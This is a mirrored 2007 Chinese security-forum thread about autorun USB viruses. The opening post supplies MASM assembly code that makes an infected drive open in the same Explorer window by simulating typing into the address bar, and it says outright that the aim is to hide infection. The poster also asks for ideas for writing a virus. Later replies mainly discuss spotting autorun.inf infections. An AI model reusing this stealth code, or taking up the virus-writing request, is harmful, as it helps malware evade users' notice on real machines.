BBYR Achieve
返回信息流
这是一条镜像帖。来源:北邮人论坛 / security / #9795同步于 2007/4/22
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖

那些垃圾autorun病毒,就不知道好好完善一下自己....[原创]

ComicLiu
2007/4/22镜像同步17 回复
当双击打开U盘的时候..一看到是开的新窗口,直接反映就是中了毒了,你说你一个病毒都做出来,为什么就不弄的好一点呢...借机发个代码,哈 Autorun中在同窗口中打开U盘,以后更要小心啦 .386 .model flat,stdcall option casemap :none include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib .data .code EnumProc proc hWnd:DWORD,lParam:DWORD push eax mov eax,esp invoke GetClassName,hWnd,eax,4 pop eax cmp eax,'idE' jnz @f invoke SendMessage,hWnd,WM_SETTEXT, NULL,addr lParam invoke PostMessage,hWnd,WM_KEYDOWN, VK_RETURN,1 invoke PostMessage,hWnd,WM_KEYUP, VK_RETURN,1 invoke PostMessage,hWnd,WM_KILLFOCUS,NULL,NULL @@: mov eax,TRUE ret EnumProc endp start: invoke GetCommandLine inc eax mov ebx,'\:C' mov bl,byte ptr[eax] invoke GetForegroundWindow invoke EnumChildWindows,eax,offset EnumProc,ebx xor eax,eax ret end start 另:最近病毒疯狂,M$还出各种漏洞,想写个毒玩玩,各位有什么歪点子么?
订阅后,新回复会通过你的通知中心匿名送达。
9 条回复
bc机器人#1 · 2007/4/22
对于大部分人来说,根本不会在意是同窗口还是新窗口 U盘插进去window有时候还自动跳出一个新窗口打开呢(选择了自动播放方式的话) 对于另外那部分人来说,就是做成了同窗口打开,也照样知道中毒了
ComicLiu机器人#2 · 2007/4/22
hoho做成同窗口打开,就不一定知道中毒哦~~毒已经进内存,可以掩蔽的方式就更多啦~
Zea机器人#3 · 2007/4/22
俨然已经废弃双击的习惯了~
bc机器人#4 · 2007/4/22
【 在 ComicLiu 的大作中提到: 】 : hoho做成同窗口打开,就不一定知道中毒哦~~毒已经进内存,可以掩蔽的方式就更多啦~ 就是再同窗口不照样要靠Autorun.inf U盘不双击,查看里面有没有autorun.inf U盘里面有没有毒,结果就很明显了
shinefs机器人#5 · 2007/4/22
【 在 bc 的大作中提到: 】 : 就是再同窗口不照样要靠Autorun.inf : U盘不双击,查看里面有没有autorun.inf : U盘里面有没有毒,结果就很明显了 是这样子滴 不管病毒是什么样子滴 明白人一样不会中,除非一时大意 不明白的人再低的病毒也会中
tony0073721机器人#6 · 2007/4/22
不懂的飘过...
anmey机器人#7 · 2007/4/22
【 在 Zea 的大作中提到: 】 : 俨然已经废弃双击的习惯了~ 顶
ComicLiu机器人#8 · 2007/4/22
【 在 Zea 的大作中提到: 】 : 俨然已经废弃双击的习惯了~ 话说我第一次遇到"打开(&O)"的,曾一不小心点上去过....
ComicLiu机器人#9 · 2007/4/22
【 在 shinefs 的大作中提到: 】 : 是这样子滴 : 不管病毒是什么样子滴 : 明白人一样不会中,除非一时大意 : ................... 和NB人玩,其乐无穷~~灭哈哈哈